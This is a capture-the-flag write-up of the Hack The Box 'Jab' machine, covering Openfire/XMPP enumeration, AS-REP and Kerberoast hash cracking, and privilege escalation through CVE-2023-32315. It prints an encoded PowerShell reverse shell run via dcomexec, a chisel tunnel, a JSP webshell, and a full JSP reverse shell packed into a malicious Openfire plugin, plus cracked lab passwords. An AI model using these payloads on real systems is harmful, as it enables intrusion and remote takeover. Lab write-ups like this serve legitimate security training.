🥊

Jab

53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49712,49766
notion image
notion image
echo "10.129.225.173 jab.htb dc01.jab.htb" >> /etc/hosts
 
notion image
kerbrute userenum -d jab.htb --dc 10.129.225.173 /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
generated a very large username lists. not useful as from now.
back to port 5222, searching online
nothing found
move on 7070/tcp open realserver
it shows Openfire HTTP Binding Service
 
download pidgin
 
notion image
register a new account, login.
under room list function, i found 2 room, test and test2.
notion image
room test cannot be opened, while i find a bdavis user in room test2.
notion image
bdavis were trying to send a xss payload in the channel.
(Wednesday, November 22, 2023 02:49:50 AM HKT) bdavis: <img src="data:image/png;base64,VGhlIGltYWdlIGRhdGEgZ29lcyBoZXJlCg==" alt="some text" />
notion image
try add a plugin called Service DIscovery
notion image
find 4 services available
search for user
notion image
sudo pidgin -d > output.log
add xmpp console plugin, then search for users
notion image
export them out as xml format (userlist file)
grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' userlist | sed 's/@jab.htb//g' | sort | uniq > userlists rm userlist
GetNPUsers.py jab.htb/ -usersfile userlists -outputfile output -no-pass -dc-ip 10.129.225.173 -no-pass
enumerate again with new wordlists to find if there is any user is pre-auth set
notion image
get three account’s hashes
hashcat -m 18200 output /usr/share/wordlists/rockyou.txt
run hashcat to bruteforce the password, it takes time
notion image
get a credential jmontgomery:Midnight_121
update this cred with pidgin
notion image
here comes a new room pentest2003, here is the history dialogue:
(Wednesday, November 22, 2023 02:31:13 AM HKT) adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status? (Wednesday, November 22, 2023 02:33:58 AM HKT) bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate. (Wednesday, November 22, 2023 03:30:41 AM HKT) bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate? (Wednesday, November 22, 2023 03:30:43 AM HKT) bdavis: $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------ -------- -------------------------- --------- ---------- http/xmpp.jab.local svc_openfire 2023-10-27 15:23:49.811611 <never> [-] CCache file is not found. Skipping... $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP> (Wednesday, November 22, 2023 03:30:56 AM HKT) bdavis: $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt hashcat (v6.1.1) starting... <SNIP> $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$4fea18693e1cb97f3e096288a76204437f115fe49b9611e339154e0effb1d0fcccfbbbb219da829b0ac70e8420f2f35a4f315c5c6f1d4ad3092e14ccd506e9a3bd3d20854ec73e62859cd68a7e6169f3c0b5ab82064b04df4ff7583ef18bbd42ac529a5747102c2924d1a76703a30908f5ad41423b2fff5e6c03d3df6c0635a41bea1aca3e15986639c758eef30b74498a184380411e207e5f3afef185eaf605f543c436cd155823b7a7870a3d5acd0b785f999facd8b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bcca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324a6fef226bc62e2bb31897670929571cd728b43647c03e44867b148428c9dc917f1dc4a0331517b65aa52221fcfe9499017ab4e6216ced3db5837d10ad0d15e07679b56c6a68a97c1e851238cef84a78754ff5c08d31895f0066b727449575a1187b19ad8604d583ae07694238bae2d4839fb20830f77fffb39f9d6a38c1c0d524130a6307125509422498f6c64adc030bfcf616c4c0d3e0fa76dcde0dfc5c94a4cb07ccf4cac941755cfdd1ed94e37d90bd1b612fee2ced175aa0e01f2919e31614f72c1ff7316be4ee71e80e0626b787c9f017504fa717b03c94f38fe9d682542d3d7edaff777a8b2d3163bc83c5143dc680c7819f405ec207b7bec51dabcec4896e110eb4ed0273dd26c82fc54bb2b5a1294cb7f3b654a13b4530bc186ff7fe3ab5a802c7c91e664144f92f438aecf9f814f73ed556dac403daaefcc7081957177d16c1087f058323f7aa3dfecfa024cc842aa3c8ef82213ad4acb89b88fc7d1f68338e8127644cfe101bf93b18ec0da457c9136e3d0efa0d094994e1591ecc4:!@#$%^&*(1qazxsw Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, TGS-REP Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4 Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs) Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 14344385/14344385 (100.00%) Rejected.........: 0/14344385 (0.00%) Restore.Point....: 14336000/14344385 (99.94%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103] Started: Fri Oct 27 15:30:09 2023 Stopped: Fri Oct 27 15:30:29 2023 (Wednesday, November 22, 2023 03:31:57 AM HKT) adunn: I'll pass this along and circle back with the group (Wednesday, November 22, 2023 03:32:23 AM HKT) bdavis: perfect, thanks Angela! (Wednesday, November 22, 2023 02:22:55 AM HKT) The topic is:
found another credential svc_openfire:!@#$%^&*(1qazxsw in this room
evil-winrm -i 10.129.225.173 -u jab.htb/svc_openfire -p '!@#$%^&*(1qazxsw'
try this creds on evil-winrm , but it failed to login
impacket-dcomexec -object MMC20 jab.htbenfire:'!@#$%^&*(1qazxsw'@10.129.230.215 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAiACwANgA2ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' -nooutput
get the connection back
notion image
notion image
notion image
upload a chisel for port fowarding
chisel server -p 3456 --reverse . ./chisel.exe client -v 10.10.14.4:3456 R:9090:127.0.0.1:9090
notion image
notion image
googling for exploit, i found
CVE-2023-32315
miko550 • Updated Aug 3, 2024
this Poc does not work for creating a new admin account
as i tried the previous creds i got from svc_openfire, i login in into the admin panel
notion image
notion image
continue exploitation
notion image
page that for uploading plugins
back to article
https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass/releases
CVE-2023-32315-Openfire-Bypass
tangxiaofeng7 • Updated Jun 12, 2024
notion image
uploaded but not accessible
create a webshell called webshell.jsp:
<% String cmd = request.getParameter("cmd"); if ( cmd != null) { java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); String line = in.readLine(); if (line != null) { response.setHeader("X-Error", line); } } %>
Then pack up to merge a .jar payload as plugin.
git clone https://github.com/igniterealtime/openfire-exampleplugin.git cd openfire-exampleplugin cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp mvn -B package cp ./target/exampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip ./plugin.xml ./readme.html; mv exampleplugin.zip ./target/exampleplugin.jar;
it’s time-intensive to build under maven
notion image
upload
notion image
curl -v "http://127.0.0.1:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/plugins/exampleplugin/exampleplugin-page.jsp?cmd=whoami"
seems it doesn’t work, i then create a jsp reverse shell and do the build again
<% /* * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file. * If it cannot connect, an HTML will prompt and you can input commands (sh/cmd) there and it will prompts the output in the HTML. * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button "send" is clicked, it will try to connect to the reverse shell again (apart from executing * the command specified in the HTML form). This is to avoid to keep it simple. */ %> <%@page import="java.lang.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <%@page import="java.util.*"%> <html> <head> <title>jrshell</title> </head> <body> <form METHOD="POST" NAME="myform" ACTION=""> <input TYPE="text" NAME="shell"> <input TYPE="submit" VALUE="Send"> </form> <pre> <% // Define the OS String shellPath = null; try { if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { shellPath = new String("/bin/sh"); } else { shellPath = new String("cmd.exe"); } } catch( Exception e ){} // INNER HTML PART if (request.getParameter("shell") != null) { out.println("Command: " + request.getParameter("shell") + "\n<BR>"); Process p; if (shellPath.equals("cmd.exe")) p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("shell")); else p = Runtime.getRuntime().exec("/bin/sh -c " + request.getParameter("shell")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } // TCP PORT PART class StreamConnector extends Thread { InputStream wz; OutputStream yr; StreamConnector( InputStream wz, OutputStream yr ) { this.wz = wz; this.yr = yr; } public void run() { BufferedReader r = null; BufferedWriter w = null; try { r = new BufferedReader(new InputStreamReader(wz)); w = new BufferedWriter(new OutputStreamWriter(yr)); char buffer[] = new char[8192]; int length; while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 ) { w.write( buffer, 0, length ); w.flush(); } } catch( Exception e ){} try { if( r != null ) r.close(); if( w != null ) w.close(); } catch( Exception e ){} } } try { Socket socket = new Socket( "10.10.14.4", 4444 ); // Replace with wanted ip and port Process process = Runtime.getRuntime().exec( shellPath ); new StreamConnector(process.getInputStream(), socket.getOutputStream()).start(); new StreamConnector(socket.getInputStream(), process.getOutputStream()).start(); out.println("port opened on " + socket); } catch( Exception e ) {} %> </pre> </body> </html>
cd openfire-exampleplugin cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp mvn -B package cp ./target/exampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip ./plugin.xml ./readme.html; mv exampleplugin.zip ./target/exampleplugin.jar;
it works!
notion image
rooted!
Â